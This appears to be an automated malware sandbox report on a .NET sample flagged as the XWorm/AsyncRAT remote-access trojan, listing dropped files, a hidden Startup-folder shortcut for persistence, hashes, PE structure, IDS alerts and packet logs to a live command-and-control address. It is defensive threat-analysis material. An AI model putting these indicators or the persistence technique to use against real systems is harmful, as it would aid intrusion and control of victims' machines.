SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cff3fhm4.auj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_efjlq1gg.mgg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ica10m5q.k1f.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhg5xajd.jc3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nl01sg4m.emc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ny524qb5.ubn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oo42gmop.huk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbfoqrud.h2b.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_voejhd0j.g1g.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1gijp3l.4jg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwmutoam.l5z.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\mstc.exe

Download File

Process:	C:\ProgramData\XClient.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.874682056258246
Encrypted:	false
SSDEEP:	1536:lsWpKMhKgPr9P9M331swicgAbaRr/pt1As6BpfoBOCHEUrBpQ:/pKMhb9PS3+vcHbahBApfEOk0
MD5:	5B7AC9829CDCA0B5E82604191DCC1D4E
SHA1:	5E944B6AFEA5DB67B4D272A7B02BDF5501CA213F
SHA-256:	BC8306A6F60583DE0B2A2818F1F9D1DF8E80EF29DCF46B9471E4697F219E1251
SHA-512:	505491B019E948B14500867E927C9AB48642571733B944AFC054922ED46A25EEBBFAE1615500E4755B0F022E5993CC4BD5124CF27C218A118070812E92BC1B33
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\mstc.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\mstc.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\mstc.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\mstc.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\mstc.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...."'f.................D...........c... ........@.. ....................................@.................................\c..O.................................................................................... ............... ..H............text....C... ...D.................. ..`.rsrc................F..............@..@.reloc...............L..............@..B.................c......H.......Pu..........&.....................................................(.....r...p. ......(.....r...p. E/...s.........s.........s.........s..........r5..p. ..Z..rO..p. .x!..ri..p. ....r...p. .y4..r...p..((....r...p. z....r...p. p{..(,...-.(-...,.+.(....,.+.(+...,.+.(...,..(d..."(....+."(....+.&(I...&+..+5sq... .... .'..or...(,...~....-.(e...(W...~....os...&.-..r)..p. S....rC..p. .....r]..p.rw..p. 9....r...p.r...p. ....r...p. .`...r

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mstc.lnk

Download File

Process:	C:\ProgramData\XClient.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 23:53:12 2024, mtime=Tue Apr 23 23:53:12 2024, atime=Tue Apr 23 23:53:12 2024, length=85504, window=hide
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	4.981155329908579
Encrypted:	false
SSDEEP:	24:8IT1fu57LewL+hRvgKqTwAFwZyw78Mby+kOqygm:8IT1fu5uhRKLFwZywY+kLyg
MD5:	82447EFB383187642455BC0613A1252A
SHA1:	2114C28CC138CB43ED61A08F2A451A74E9B7B8AC
SHA-256:	1AD2D82714A8A85E14ED5DD2172F8F09C07060C03F454758F7E2F57F3732702A
SHA-512:	707247D35D85D36C1266FE1D35240E21DEA9FB49DBEC4D36A20AAE60B9C94F86BB1882A673745D6DEFCD3BB7A0014FA4E5FDE3C65E529D68F9683D456036E6B2
Malicious:	false
Preview:	L..................F.... .........................N........................:..DG..Yr?.D..U..k0.&...&.......bBDj...........K.........t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Xz...........................=...A.p.p.D.a.t.a...B.P.1......Xx...Local.<......EWsG.Xz..........................<t..L.o.c.a.l.....N.1......X....Temp..:......EWsG.X............................H.T.e.m.p.....Z.2..N...X.. .mstc.exe..B......X...X............................dq..m.s.t.c...e.x.e.......X...............-.......W............~6D.....C:\Users\user\AppData\Local\Temp\mstc.exe..%.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.m.s.t.c...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......618321...........hT..CrF.f4... ..........,...E...hT..CrF.f4... ..........,...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.947050471420855
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Output.exe
File size:	200'704 bytes
MD5:	edd7441051bbf509ef1052d9f2a02c8f
SHA1:	7338ef9ddb0b59228b31c6b7931fae04ace344e8
SHA256:	500b51771f03e61f1c46fc29c2a786201c123ae5f0369bd1664992bd7c434a30
SHA512:	0aa4f2666213b571114cdd56c859200ab34a615cde57e67d142d4522369c74b8d4c37c9c95c97a76b93abbb0795ce698e4a888e646fdd2b05fe80f81da074f93
SSDEEP:	3072:LhAMBSpVNwpB7/LaX6No7INoSXlb2Q4u3lriJYzr9B/erenNecMnq+ECqmIkk6:LaP+fvLW7IVXliQz3l//3Pyq+RqmI
TLSH:	D91412C1DA6428EBD16A0FB209570A7516A06E70FC3E597733CA9E8F50C75E6F372028
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F"'f............................N%... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x43254e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66272246 [Tue Apr 23 02:51:50 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x324f8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0x4ce	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x36000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x30554	0x30600	fce464100d1103389dd1011b47bb452a	False	0.9547450339147286	data	7.968642952514327	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x34000	0x4ce	0x600	1e12708b58b6054526468e1040212b42	False	0.3736979166666667	data	3.726050043701057	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x36000	0xc	0x200	15c644aa2aaafd0f11b9c0791102ef71	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x340a0	0x244	data			0.4706896551724138
RT_MANIFEST	0x342e4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/24/24-02:54:09.223298	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	7000	49725	91.92.252.220	192.168.2.9
04/24/24-02:53:39.286910	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49725	7000	192.168.2.9	91.92.252.220
04/24/24-02:54:09.229919	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49725	7000	192.168.2.9	91.92.252.220
04/24/24-02:54:00.388941	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	7000	49725	91.92.252.220	192.168.2.9

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 02:51:57.728737116 CEST	49706	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:51:58.027988911 CEST	9078	49706	91.92.252.220	192.168.2.9
Apr 24, 2024 02:51:58.539408922 CEST	49706	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:51:58.838099003 CEST	9078	49706	91.92.252.220	192.168.2.9
Apr 24, 2024 02:51:59.351958990 CEST	49706	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:51:59.650432110 CEST	9078	49706	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:00.100121021 CEST	49707	80	192.168.2.9	208.95.112.1
Apr 24, 2024 02:52:00.164418936 CEST	49706	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:00.259752989 CEST	80	49707	208.95.112.1	192.168.2.9
Apr 24, 2024 02:52:00.259845018 CEST	49707	80	192.168.2.9	208.95.112.1
Apr 24, 2024 02:52:00.260536909 CEST	49707	80	192.168.2.9	208.95.112.1
Apr 24, 2024 02:52:00.420644045 CEST	80	49707	208.95.112.1	192.168.2.9
Apr 24, 2024 02:52:00.461420059 CEST	49707	80	192.168.2.9	208.95.112.1
Apr 24, 2024 02:52:00.462759018 CEST	9078	49706	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:00.977050066 CEST	49706	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:01.275252104 CEST	9078	49706	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:06.353557110 CEST	49708	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:06.648196936 CEST	9078	49708	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:07.148839951 CEST	49708	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:07.443952084 CEST	9078	49708	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:07.945941925 CEST	49708	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:08.240844011 CEST	9078	49708	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:08.742578983 CEST	49708	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:09.037296057 CEST	9078	49708	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:09.539522886 CEST	49708	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:09.834100008 CEST	9078	49708	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:14.853634119 CEST	49712	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:15.151799917 CEST	9078	49712	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:15.836401939 CEST	49712	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:16.134831905 CEST	9078	49712	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:16.666167974 CEST	49712	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:16.964287043 CEST	9078	49712	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:17.539495945 CEST	49712	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:17.837783098 CEST	9078	49712	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:18.445720911 CEST	49712	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:18.743894100 CEST	9078	49712	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:23.759830952 CEST	49713	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:24.058249950 CEST	9078	49713	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:24.648874044 CEST	49713	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:24.947568893 CEST	9078	49713	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:25.633277893 CEST	49713	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:25.931724072 CEST	9078	49713	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:26.445804119 CEST	49713	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:26.745296001 CEST	9078	49713	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:27.445811987 CEST	49713	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:27.744071007 CEST	9078	49713	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:32.368707895 CEST	80	49707	208.95.112.1	192.168.2.9
Apr 24, 2024 02:52:32.368784904 CEST	49707	80	192.168.2.9	208.95.112.1
Apr 24, 2024 02:52:32.790973902 CEST	49714	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:33.089221954 CEST	9078	49714	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:33.648909092 CEST	49714	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:33.947308064 CEST	9078	49714	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:34.649045944 CEST	49714	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:34.947415113 CEST	9078	49714	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:35.648922920 CEST	49714	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:35.947446108 CEST	9078	49714	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:36.648920059 CEST	49714	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:36.947213888 CEST	9078	49714	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:41.962583065 CEST	49715	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:42.260968924 CEST	9078	49715	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:42.836446047 CEST	49715	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:43.134824038 CEST	9078	49715	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:43.742726088 CEST	49715	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:44.041342020 CEST	9078	49715	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:44.742693901 CEST	49715	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:45.040940046 CEST	9078	49715	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:45.648931026 CEST	49715	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:45.947356939 CEST	9078	49715	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:50.963044882 CEST	49716	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:51.261358976 CEST	9078	49716	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:51.836532116 CEST	49716	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:51.882961988 CEST	80	49707	208.95.112.1	192.168.2.9
Apr 24, 2024 02:52:52.135015011 CEST	9078	49716	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:52.648952961 CEST	49716	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:52.947160006 CEST	9078	49716	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:53.627492905 CEST	49716	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:53.925657988 CEST	9078	49716	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:54.445882082 CEST	49716	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:52:54.744179010 CEST	9078	49716	91.92.252.220	192.168.2.9
Apr 24, 2024 02:52:59.759814024 CEST	49718	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:00.058434010 CEST	9078	49718	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:00.649017096 CEST	49718	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:00.946970940 CEST	9078	49718	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:01.648993969 CEST	49718	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:01.946942091 CEST	9078	49718	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:02.649029016 CEST	49718	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:02.946918011 CEST	9078	49718	91.92.252.220	192.168.2.9
